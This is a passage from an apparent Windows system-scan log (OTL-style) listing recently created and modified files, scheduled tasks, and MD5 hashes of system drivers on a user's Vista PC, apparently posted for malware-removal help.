000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\AIMP [2011-07-15 20:59:19 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AIMP2 [2011-07-15 20:59:16 | 000,000,000 | ---D | C] -- C:\Program Files\AIMP2 [2011-07-15 20:38:47 | 000,000,000 | ---D | C] -- C:\Users\Max\Documents\Simply Super Software [2011-07-15 20:38:46 | 000,000,000 | ---D | C] -- C:\ProgramData\TEMP [2011-07-15 20:38:21 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trojan Remover [2011-07-15 20:38:17 | 000,000,000 | ---D | C] -- C:\Program Files\Trojan Remover [2011-07-15 20:38:17 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\Simply Super Software [2011-07-15 20:38:17 | 000,000,000 | ---D | C] -- C:\ProgramData\Simply Super Software [2011-07-13 11:48:57 | 000,000,000 | ---D | C] -- C:\Windows\System32\Adobe [2011-07-11 13:14:07 | 000,000,000 | ---D | C] -- C:\Program Files\DAEMON Tools Toolbar [2011-07-11 13:13:33 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\DAEMON Tools Lite [2011-07-11 13:13:33 | 000,000,000 | ---D | C] -- C:\ProgramData\DAEMON Tools Lite [2011-07-09 17:31:35 | 000,000,000 | ---D | C] -- C:\7' [2011-07-08 16:01:51 | 000,000,000 | ---D | C] -- C:\Program Files\RegCleaner [2011-07-08 14:36:31 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\avast! Free Antivirus [2011-07-08 14:36:30 | 000,019,544 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswFsBlk.sys [2011-07-08 14:36:29 | 000,309,848 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswSP.sys [2011-07-08 14:36:27 | 000,043,608 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswTdi.sys [2011-07-08 14:36:27 | 000,025,432 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswRdr.sys [2011-07-08 14:36:26 | 000,441,176 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswSnx.sys [2011-07-08 14:36:25 | 000,054,104 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswMonFlt.sys [2011-07-08 14:35:28 | 000,199,304 | ---- | C] (AVAST Software) -- C:\Windows\System32\aswBoot.exe [2011-07-08 14:35:28 | 000,040,112 | ---- | C] (AVAST Software) -- C:\Windows\avastSS.scr [2011-07-08 13:37:06 | 000,000,000 | ---D | C] -- C:\Dokument [2011-07-08 13:34:44 | 000,000,000 | ---D | C] -- C:\Zdjecia [2011-06-28 10:35:24 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\Skype [2011-06-28 10:35:18 | 000,000,000 | ---D | C] -- C:\ProgramData\Google [2011-06-28 10:34:59 | 000,000,000 | ---D | C] -- C:\ProgramData\Skype [2011-06-25 22:56:47 | 000,000,000 | -H-D | C] -- C:\Users\Max\Desktop\.picasaoriginals [2011-06-08 20:47:46 | 000,000,000 | ---D | C] -- C:\Program Files\Adobe [2011-06-04 13:37:46 | 000,000,000 | ---D | C] -- C:\ProgramData\RDRM [2011-06-04 13:37:45 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\ipla [2011-06-04 13:37:45 | 000,000,000 | ---D | C] -- C:\ProgramData\ipla [2011-06-04 13:37:42 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ipla [2011-06-04 13:37:31 | 000,000,000 | ---D | C] -- C:\Program Files\ipla [2011-06-02 17:48:18 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office [2011-06-02 17:47:10 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\DESIGNER [2011-06-02 17:46:34 | 000,000,000 | ---D | C] -- C:\Windows\PCHEALTH [2011-06-02 17:42:46 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft.NET [2011-06-02 17:41:29 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Office [2011-05-29 19:45:53 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\Opera [2011-05-29 19:45:53 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Local\Opera [2011-05-29 19:45:48 | 000,000,000 | ---D | C] -- C:\Program Files\Opera [2011-05-29 19:45:33 | 000,000,000 | R--D | C] -- C:\Users\Max\Downloads [2011-05-20 22:27:14 | 000,000,000 | ---D | C] -- C:\Program Files\Gadu-Gadu [2011-05-20 13:40:14 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\vlc [2008-11-10 13:50:10 | 000,167,936 | ---- | C] ( ) -- C:\Windows\System32\rsnp2uvc.dll [2008-11-10 13:50:10 | 000,053,248 | ---- | C] ( ) -- C:\Windows\System32\csnp2uvc.dll [color=#E56717]========== Files - Modified Within 60 Days ==========[/color] [2011-07-18 10:31:04 | 003,407,872 | -HS- | M] () -- C:\Users\Max\ntuser.dat [2011-07-18 10:30:01 | 000,000,264 | ---- | M] () -- C:\Windows\tasks\Sprawdź aktualizacje paska narzędzi Windows Live Toolbar.job [2011-07-18 10:28:19 | 000,003,472 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0 [2011-07-18 10:28:19 | 000,003,472 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0 [2011-07-18 10:16:33 | 000,535,568 | ---- | M] () -- C:\Windows\System32\perfh015.dat [2011-07-18 10:16:33 | 000,086,416 | ---- | M] () -- C:\Windows\System32\perfc015.dat [2011-07-18 10:16:32 | 001,326,240 | ---- | M] () -- C:\Windows\System32\PerfStringBackup.INI [2011-07-18 10:16:32 | 000,610,142 | ---- | M] () -- C:\Windows\System32\perfh009.dat [2011-07-18 10:16:32 | 000,103,924 | ---- | M] () -- C:\Windows\System32\perfc009.dat [2011-07-18 08:28:20 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat [2011-07-17 22:11:39 | 000,065,536 | ---- | M] () -- C:\Windows\System32\Ikeext.etl [2011-07-17 22:11:14 | 000,000,006 | -H-- | M] () -- C:\Windows\tasks\SA.DAT [2011-07-17 22:10:44 | 2137,440,256 | -HS- | M] () -- C:\hiberfil.sys [2011-07-17 22:10:41 | 244,776,646 | ---- | M] () -- C:\Windows\MEMORY.DMP [2011-07-17 21:40:32 | 000,073,728 | -H-- | M] () -- C:\Users\Max\Desktop\photothumb.db [2011-07-17 17:47:58 | 083,249,807 | ---- | M] () -- C:\Users\Max\Desktop\Disco_Polo_Mp3_16.06.2011_www.djoles.pl.rar [2011-07-17 17:42:26 | 057,380,242 | ---- | M] () -- C:\Users\Max\Desktop\Paczka_Disco-Polo_Mp3_(11.07.2011)_(www.DjOles.pl).rar [2011-07-17 11:43:26 | 000,000,428 | -H-- | M] () -- C:\Windows\tasks\User_Feed_Synchronization-{D9B30BB4-63C0-47D4-A444-A174F9308500}.job [2011-07-16 12:06:06 | 000,012,372 | ---- | M] () -- C:\Windows\bthservsdp.dat [2011-07-16 12:05:56 | 002,654,450 | -H-- | M] () -- C:\Users\Max\AppData\Local\IconCache.db [2011-07-16 10:48:33 | 000,057,344 | ---- | M] () -- C:\Users\Max\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2011-07-16 07:39:12 | 000,000,298 | ---- | M] () -- C:\Windows\win.ini [2011-07-15 21:16:30 | 000,002,533 | ---- | M] () -- C:\Users\Max\Desktop\HiJackThis.lnk [2011-07-15 21:00:05 | 000,000,770 | ---- | M] () -- C:\Users\Public\Desktop\AIMP2.lnk [2011-07-15 20:38:21 | 000,000,886 | ---- | M] () -- C:\Users\Public\Desktop\Trojan Remover.lnk [2011-07-13 15:46:42 | 000,000,271 | ---- | M] () -- C:\Users\Max\fix.reg [2011-07-13 15:46:42 | 000,000,271 | ---- | M] () -- C:\Users\Max\Desktop\fix.reg [2011-07-12 22:59:00 | 000,000,130 | ---- | M] () -- C:\Users\Max\Desktop\Add.url [2011-07-12 14:30:46 | 000,000,856 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk [2011-07-11 15:39:33 | 005,279,948 | ---- | M] () -- C:\Users\Max\Desktop\Aga M. - Za późno na słowa (www.DjOles.pl).mp3 [2011-07-11 11:13:17 | 001,383,966 | ---- | M] () -- C:\Users\Max\Desktop\lakiery%20dzbanek%20lemax%20nowe%20kolory.jpg [2011-07-08 16:02:52 | 000,000,777 | ---- | M] () -- C:\Users\Max\Desktop\RegCleaner.lnk [2011-07-08 14:36:31 | 000,001,839 | ---- | M] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk [2011-07-08 14:36:25 | 000,002,577 | ---- | M] () -- C:\Windows\System32\config.nt [2011-07-08 14:18:03 | 000,025,269 | ---- | M] () -- C:\Windows\System32\PROCDB.INI [2011-07-08 14:18:01 | 000,000,380 | ---- | M] () -- C:\Windows\System32\IPSCtrl.INI [2011-07-04 13:43:53 | 000,040,112 | ---- | M] (AVAST Software) -- C:\Windows\avastSS.scr [2011-07-04 13:43:51 | 000,199,304 | ---- | M] (AVAST Software) -- C:\Windows\System32\aswBoot.exe [2011-07-04 13:36:43 | 000,441,176 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswSnx.sys [2011-07-04 13:36:32 | 000,309,848 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswSP.sys [2011-07-04 13:35:23 | 000,043,608 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswTdi.sys [2011-07-04 13:32:32 | 000,025,432 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswRdr.sys [2011-07-04 13:32:20 | 000,054,104 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswMonFlt.sys [2011-07-04 13:32:12 | 000,019,544 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswFsBlk.sys [2011-06-27 20:05:54 | 000,000,590 | ---- | M] () -- C:\Windows\tasks\Norton Internet Security - Uruchom pełne skanowanie systemu - Max.job [2011-06-26 08:45:56 | 000,256,000 | ---- | M] () -- C:\Windows\PEV.exe [2011-06-22 09:30:08 | 000,000,000 | ---- | M] () -- C:\Users\Public\Documents\AcSvc.dmp [2011-06-08 20:47:54 | 000,001,902 | ---- | M] () -- C:\Users\Public\Desktop\Adobe Reader X.lnk [2011-06-03 16:17:09 | 000,317,712 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT [2011-06-03 10:08:56 | 000,079,008 | ---- | M] () -- C:\Users\Max\AppData\Local\GDIPFONTCACHEV1.DAT [2011-06-02 17:49:55 | 000,000,634 | ---- | M] () -- C:\Windows\ODBC.INI [2011-05-22 21:59:25 | 000,004,096 | -H-- | M] () -- C:\Users\Max\AppData\Local\keyfile3.drm [color=#E56717]========== Files Created - No Company Name ==========[/color] [2011-07-17 21:16:08 | 005,279,948 | ---- | C] () -- C:\Users\Max\Desktop\Aga M. - Za późno na słowa (www.DjOles.pl).mp3 [2011-07-17 17:47:54 | 083,249,807 | ---- | C] () -- C:\Users\Max\Desktop\Disco_Polo_Mp3_16.06.2011_www.djoles.pl.rar [2011-07-17 17:42:23 | 057,380,242 | ---- | C] () -- C:\Users\Max\Desktop\Paczka_Disco-Polo_Mp3_(11.07.2011)_(www.DjOles.pl).rar [2011-07-15 21:23:31 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe [2011-07-15 21:23:31 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe [2011-07-15 21:23:31 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe [2011-07-15 21:23:31 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe [2011-07-15 21:23:31 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe [2011-07-15 21:16:12 | 000,002,533 | ---- | C] () -- C:\Users\Max\Desktop\HiJackThis.lnk [2011-07-15 20:59:19 | 000,000,770 | ---- | C] () -- C:\Users\Public\Desktop\AIMP2.lnk [2011-07-15 20:38:21 | 000,000,886 | ---- | C] () -- C:\Users\Public\Desktop\Trojan Remover.lnk [2011-07-15 20:38:18 | 000,162,304 | ---- | C] () -- C:\Windows\System32\ztvunrar36.dll [2011-07-15 20:38:18 | 000,153,088 | ---- | C] () -- C:\Windows\System32\UNRAR3.dll [2011-07-15 20:38:18 | 000,077,312 | ---- | C] () -- C:\Windows\System32\ztvunace26.dll [2011-07-15 20:38:18 | 000,075,264 | ---- | C] () -- C:\Windows\System32\unacev2.dll [2011-07-14 22:23:48 | 735,087,260 | ---- | C] () -- C:\Users\Max\Desktop\High School Musical.avi [2011-07-14 22:03:58 | 328,523,530 | ---- | C] () -- C:\Users\Max\Desktop\Kopciuszek - Roztańczona Historia... dmx-acs.rmvb [2011-07-13 22:20:21 | 733,636,608 | ---- | C] () -- C:\Users\Max\Desktop\Zbuntowana Księżniczka.btgigs-wc.avi [2011-07-13 22:20:14 | 348,069,959 | ---- | C] () -- C:\Users\Max\Desktop\Czego pragnie dziewczyna Lektor PL.rmvb [2011-07-13 15:46:57 | 000,000,271 | ---- | C] () -- C:\Users\Max\Desktop\fix.reg [2011-07-13 15:45:52 | 000,000,271 | ---- | C] () -- C:\Users\Max\fix.reg [2011-07-12 22:59:00 | 000,000,130 | ---- | C] () -- C:\Users\Max\Desktop\Add.url [2011-07-12 14:30:46 | 000,000,868 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk [2011-07-12 14:30:46 | 000,000,856 | ---- | C] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk [2011-07-11 11:13:40 | 001,383,966 | ---- | C] () -- C:\Users\Max\Desktop\lakiery%20dzbanek%20lemax%20nowe%20kolory.jpg [2011-07-08 16:01:52 | 000,000,777 | ---- | C] () -- C:\Users\Max\Desktop\RegCleaner.lnk [2011-07-08 14:36:31 | 000,001,839 | ---- | C] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk [2011-07-01 13:51:50 | 002,654,450 | -H-- | C] () -- C:\Users\Max\AppData\Local\IconCache.db [2011-06-26 12:28:22 | 2137,440,256 | -HS- | C] () -- C:\hiberfil.sys [2011-06-08 20:47:54 | 000,001,902 | ---- | C] () -- C:\Users\Public\Desktop\Adobe Reader X.lnk [2011-06-08 20:47:54 | 000,001,804 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk [2011-05-22 21:59:25 | 000,004,096 | -H-- | C] () -- C:\Users\Max\AppData\Local\keyfile3.drm [2011-03-29 07:52:33 | 000,000,634 | ---- | C] () -- C:\Windows\ODBC.INI [2011-01-23 22:28:13 | 000,192,512 | ---- | C] () -- C:\Windows\System32\srkey.exe [2009-03-17 17:05:25 | 000,025,773 | ---- | C] () -- C:\Users\Max\AppData\Roaming\UserTile.png [2008-11-11 10:57:59 | 000,057,344 | ---- | C] () -- C:\Users\Max\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2008-11-11 10:55:51 | 000,164,352 | ---- | C] () -- C:\Windows\System32\unrar.dll [2008-11-11 10:55:51 | 000,000,038 | ---- | C] () -- C:\Windows\avisplitter.ini [2008-11-10 22:02:05 | 000,535,568 | ---- | C] () -- C:\Windows\System32\perfh015.dat [2008-11-10 22:02:05 | 000,332,832 | ---- | C] () -- C:\Windows\System32\perfi015.dat [2008-11-10 22:02:05 | 000,086,416 | ---- | C] () -- C:\Windows\System32\perfc015.dat [2008-11-10 22:02:05 | 000,037,468 | ---- | C] () -- C:\Windows\System32\perfd015.dat [2008-11-10 14:55:08 | 000,079,008 | ---- | C] () -- C:\Users\Max\AppData\Local\GDIPFONTCACHEV1.DAT [2008-11-10 14:08:09 | 002,115,816 | ---- | C] () -- C:\Windows\System32\NPSWF32.dll [2008-11-10 13:58:42 | 001,238,832 | ---- | C] () -- C:\Windows\System32\igmedkrn.dll [2008-11-10 13:58:42 | 000,249,856 | ---- | C] () -- C:\Windows\System32\igfxTMM.dll [2008-11-10 13:58:42 | 000,147,456 | ---- | C] () -- C:\Windows\System32\igfxCoIn_v1329.dll [2008-11-10 13:58:42 | 000,104,636 | ---- | C] () -- C:\Windows\System32\igmedcompkrn.dll [2008-11-10 13:50:11 | 000,015,497 | ---- | C] () -- C:\Windows\snp2uvc.ini [2008-11-10 13:50:10 | 009,598,080 | ---- | C] () -- C:\Windows\System32\drivers\snp2uvc.sys [2008-11-10 13:43:53 | 000,012,080 | ---- | C] () -- C:\Windows\System32\drivers\TPPWR32V.SYS [2008-11-10 13:33:23 | 000,012,372 | ---- | C] () -- C:\Windows\bthservsdp.dat [2007-07-27 08:37:40 | 000,025,269 | ---- | C] () -- C:\Windows\System32\PROCDB.INI [2007-07-27 08:37:29 | 000,000,380 | ---- | C] () -- C:\Windows\System32\IPSCtrl.INI [2007-05-24 22:51:58 | 000,016,896 | ---- | C] () -- C:\Windows\Eventclr.exe [2007-05-10 18:34:13 | 000,006,218 | ---- | C] () -- C:\Windows\System32\tp4table.dat [2007-03-29 13:42:38 | 000,389,120 | ---- | C] () -- C:\Windows\System32\btwhidcs.dll [2006-11-02 14:57:28 | 000,067,584 | --S- | C] () -- C:\Windows\bootstat.dat [2006-11-02 14:47:37 | 000,317,712 | ---- | C] () -- C:\Windows\System32\FNTCACHE.DAT [2006-11-02 14:35:32 | 000,005,632 | ---- | C] () -- C:\Windows\System32\sysprepMCE.dll [2006-11-02 12:33:01 | 001,326,240 | ---- | C] () -- C:\Windows\System32\PerfStringBackup.INI [2006-11-02 12:33:01 | 000,610,142 | ---- | C] () -- C:\Windows\System32\perfh009.dat [2006-11-02 12:33:01 | 000,287,440 | ---- | C] () -- C:\Windows\System32\perfi009.dat [2006-11-02 12:33:01 | 000,103,924 | ---- | C] () -- C:\Windows\System32\perfc009.dat [2006-11-02 12:33:01 | 000,030,674 | ---- | C] () -- C:\Windows\System32\perfd009.dat [2006-11-02 12:24:31 | 000,001,405 | ---- | C] () -- C:\Windows\msdfmap.ini [2006-11-02 12:23:31 | 000,000,298 | ---- | C] () -- C:\Windows\win.ini [2006-11-02 12:23:31 | 000,000,219 | ---- | C] () -- C:\Windows\system.ini [2006-11-02 12:23:21 | 000,215,943 | ---- | C] () -- C:\Windows\System32\dssec.dat [2006-11-02 10:58:30 | 000,043,131 | ---- | C] () -- C:\Windows\mib.bin [2006-11-02 10:23:38 | 000,055,858 | ---- | C] () -- C:\Windows\System32\tcpmon.ini [2006-11-02 10:19:00 | 000,000,741 | ---- | C] () -- C:\Windows\System32\NOISE.DAT [2006-11-02 09:40:29 | 000,013,750 | ---- | C] () -- C:\Windows\System32\pacerprf.ini [2006-11-02 09:25:31 | 000,673,088 | ---- | C] () -- C:\Windows\System32\mlang.dat [2006-11-02 09:22:43 | 000,099,999 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchema.bin [2006-11-02 09:22:43 | 000,018,271 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchemaTrivial.bin [2006-11-02 09:10:37 | 000,053,536 | ---- | C] () -- C:\Windows\System32\dosx.exe [2006-11-02 09:10:02 | 000,000,718 | ---- | C] () -- C:\Windows\System32\mscdexnt.exe [2006-11-02 09:10:00 | 000,002,842 | ---- | C] () -- C:\Windows\System32\redir.exe [2006-11-02 09:09:59 | 000,069,886 | ---- | C] () -- C:\Windows\System32\edit.com [2006-11-02 09:09:59 | 000,019,694 | ---- | C] () -- C:\Windows\System32\GRAPHICS.COM [2006-11-02 09:09:59 | 000,000,882 | ---- | C] () -- C:\Windows\System32\share.exe [2006-11-02 09:09:59 | 000,000,882 | ---- | C] () -- C:\Windows\System32\fastopen.exe [2006-11-02 09:09:57 | 000,014,710 | ---- | C] () -- C:\Windows\System32\KB16.COM [2006-11-02 09:09:56 | 000,007,052 | ---- | C] () -- C:\Windows\System32\nlsfunc.exe [2006-11-02 09:09:55 | 000,039,274 | ---- | C] () -- C:\Windows\System32\mem.exe [2006-11-02 09:09:55 | 000,001,131 | ---- | C] () -- C:\Windows\System32\LOADFIX.COM [2006-11-02 09:09:53 | 000,011,753 | ---- | C] () -- C:\Windows\System32\setver.exe [2006-11-02 09:09:52 | 000,020,634 | ---- | C] () -- C:\Windows\System32\debug.exe [2006-11-02 09:09:51 | 000,008,424 | ---- | C] () -- C:\Windows\System32\exe2bin.exe [2006-11-02 09:09:50 | 000,012,642 | ---- | C] () -- C:\Windows\System32\edlin.exe [2006-11-02 09:09:49 | 000,050,648 | ---- | C] () -- C:\Windows\System32\COMMAND.COM [2006-11-02 09:09:49 | 000,012,498 | ---- | C] () -- C:\Windows\System32\append.exe [2006-11-02 09:09:45 | 000,027,097 | ---- | C] () -- C:\Windows\System32\country.sys [2006-11-02 09:09:44 | 000,042,809 | ---- | C] () -- C:\Windows\System32\KEY01.SYS [2006-11-02 09:09:44 | 000,042,537 | ---- | C] () -- C:\Windows\System32\KEYBOARD.SYS [2006-11-02 09:09:42 | 000,009,029 | ---- | C] () -- C:\Windows\System32\ANSI.SYS [2006-11-02 09:09:41 | 000,004,768 | ---- | C] () -- C:\Windows\System32\HIMEM.SYS [2006-11-02 09:09:40 | 000,029,274 | ---- | C] () -- C:\Windows\System32\NTDOS412.SYS [2006-11-02 09:09:38 | 000,029,370 | ---- | C] () -- C:\Windows\System32\NTDOS411.SYS [2006-11-02 09:09:35 | 000,029,146 | ---- | C] () -- C:\Windows\System32\NTDOS404.SYS [2006-11-02 09:09:31 | 000,029,146 | ---- | C] () -- C:\Windows\System32\NTDOS804.SYS [2006-11-02 09:09:29 | 000,027,866 | ---- | C] () -- C:\Windows\System32\NTDOS.SYS [2006-11-02 09:09:26 | 000,035,536 | ---- | C] () -- C:\Windows\System32\NTIO412.SYS [2006-11-02 09:09:24 | 000,035,776 | ---- | C] () -- C:\Windows\System32\NTIO411.SYS [2006-11-02 09:09:23 | 000,034,672 | ---- | C] () -- C:\Windows\System32\NTIO404.SYS [2006-11-02 09:09:22 | 000,034,672 | ---- | C] () -- C:\Windows\System32\NTIO804.SYS [2006-11-02 09:09:20 | 000,033,952 | ---- | C] () -- C:\Windows\System32\NTIO.SYS [2006-11-02 08:47:51 | 000,364,544 | ---- | C] () -- C:\Windows\System32\msjetoledb40.dll [2006-11-02 08:25:08 | 000,013,312 | ---- | C] () -- C:\Windows\System32\win87em.dll [2003-04-08 11:40:22 | 000,005,679 | ---- | C] () -- C:\Windows\System32\OUTLPERF.INI [2001-11-14 14:56:00 | 001,802,240 | ---- | C] () -- C:\Windows\System32\lcppn21.dll [color=#E56717]========== LOP Check ==========[/color] [2011-07-15 21:19:24 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\AIMP [2011-04-03 14:50:26 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\BitSpirit [2011-07-11 13:16:11 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\DAEMON Tools Lite [2011-05-02 20:57:59 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Gadu-Gadu [2011-04-27 08:53:20 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Gadu-Gadu 10 [2010-11-13 15:49:20 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\HateML [2011-07-14 22:04:25 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\ipla [2009-05-01 22:19:23 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\iPlus [2009-04-13 09:10:20 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Leadertech [2008-11-10 14:55:49 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Lenovo [2011-06-04 13:27:40 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Nowe Gadu-Gadu [2011-04-02 19:50:14 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\OpenFM [2011-05-29 19:45:53 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Opera [2009-03-17 17:05:22 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\PeerNetworking [2011-07-08 14:15:55 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\PhotoScape [2011-07-15 21:13:47 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Safer Networking [2011-07-15 20:38:17 | 000,000,000 | ---D | M] -- C:\Users\Max\AppData\Roaming\Simply Super Software [2011-07-16 12:06:05 | 000,032,618 | ---- | M] () -- C:\Windows\Tasks\SCHEDLGU.TXT [2011-07-18 10:30:01 | 000,000,264 | ---- | M] () -- C:\Windows\Tasks\Sprawdź aktualizacje paska narzędzi Windows Live Toolbar.job [2011-07-17 11:43:26 | 000,000,428 | -H-- | M] () -- C:\Windows\Tasks\User_Feed_Synchronization-{D9B30BB4-63C0-47D4-A444-A174F9308500}.job [color=#E56717]========== Purity Check ==========[/color] [color=#E56717]========== Custom Scans ==========[/color] [color=#A23BEC]< %systemdrive%\*.* >[/color] [2006-09-18 23:43:36 | 000,000,024 | ---- | M] () -- C:\autoexec.bat [2006-11-02 11:53:57 | 000,438,840 | RHS- | M] () -- C:\bootmgr [2006-11-10 03:04:46 | 000,008,192 | R-S- | M] () -- C:\BOOTSECT.BAK [2006-09-18 23:43:37 | 000,000,010 | ---- | M] () -- C:\config.sys [2011-07-17 22:10:44 | 2137,440,256 | -HS- | M] () -- C:\hiberfil.sys [2011-07-17 22:10:41 | 2451,374,080 | -HS- | M] () -- C:\pagefile.sys [2008-11-10 13:47:29 | 000,000,086 | ---- | M] () -- C:\setup.log [2008-11-10 21:58:14 | 000,000,057 | ---- | M] () -- C:\syslevel.lgl [2008-11-10 14:31:24 | 000,001,732 | ---- | M] () -- C:\tvtpktfilter.dat [color=#A23BEC]< MD5 for: AGP440.SYS >[/color] [2008-01-19 09:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\SoftwareDistribution\Download\2b4e48d0ede6112a59b10e3704a22eee\x86_machine.inf_31bf3856ad364e35_6.0.6001.18000_none_ba12ed3bbeb0d97a\AGP440.sys [2008-11-10 22:03:14 | 000,056,504 | ---- | M] (Microsoft Corporation) MD5=198636E76971EBC96404547EC0FD5E75 -- C:\Windows\System32\drivers\AGP440.sys [2008-11-10 22:03:14 | 000,056,504 | ---- | M] (Microsoft Corporation) MD5=198636E76971EBC96404547EC0FD5E75 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_cb7c81c7\AGP440.sys [2008-11-10 22:03:14 | 000,056,504 | ---- | M] (Microsoft Corporation) MD5=198636E76971EBC96404547EC0FD5E75 -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.0.6000.20598_none_b85cfa98dae9b436\AGP440.sys [2006-11-02 11:49:52 | 000,053,864 | ---- | M] (Microsoft Corporation) MD5=EF23439CDD587F64C2C1B8825CEAD7D8 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_920a2c1f\AGP440.sys [color=#A23BEC]< MD5 for: ATAPI.SYS >[/color] [2008-01-19 09:41:30 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=2D9C903DC76A66813D350A562DE40ED9 -- C:\Windows\SoftwareDistribution\Download\2b4e48d0ede6112a59b10e3704a22eee\x86_mshdc.inf_31bf3856ad364e35_6.0.6001.18000_none_dd38281a2189ce9c\atapi.sys [2006-11-02 11:49:36 | 000,019,048 | ---- | M] (Microsoft Corporation) MD5=4F4FCB8B6EA06784FB6D475B7EC7300F -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_c6c2e699\atapi.sys [2008-11-10 22:22:17 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\System32\drivers\atapi.sys [2008-11-10 22:22:17 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_7de13c21\atapi.sys [2008-11-10 22:22:17 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6000.16632_none_db337a442479c42c\atapi.sys [2008-11-10 22:22:17 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=E03E8C99D15D0381E02743C36AFC7C6F -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6000.20757_none_dbac78a93da31a8b\atapi.sys [color=#A23BEC]< MD5 for: BEEP.SYS >[/color] [2008-01-19 07:49:10 | 000,006,144 | ---- | M] (Microsoft Corporation) MD5=67E506B75BD5326A3EC7B70BD014DFB6 -- C:\Windows\SoftwareDistribution\Download\2b4e48d0ede6112a59b10e3704a22eee\x86_microsoft-windows-beepsys_31bf3856ad364e35_6.0.6001.18000_none_c420a153079d485b\beep.sys [2006-11-02 10:51:03 | 000,006,144 | ---- | M] (Microsoft Corporation) MD5=AC3DD1708B22761EBD7CBE14DCC3B5D7 -- C:\Windows\System32\drivers\beep.sys [2006-11-02 10:51:03 | 000,006,144 | ---- | M] (Microsoft Corporation) MD5=AC3DD1708B22761EBD7CBE14DCC3B5D7 -- C:\Windows\winsxs\x86_microsoft-windows-beepsys_31bf3856ad364e35_6.0.6000.16386_none_c1e9df570ab23787\beep.sys [color=#A23BEC]< MD5 for: 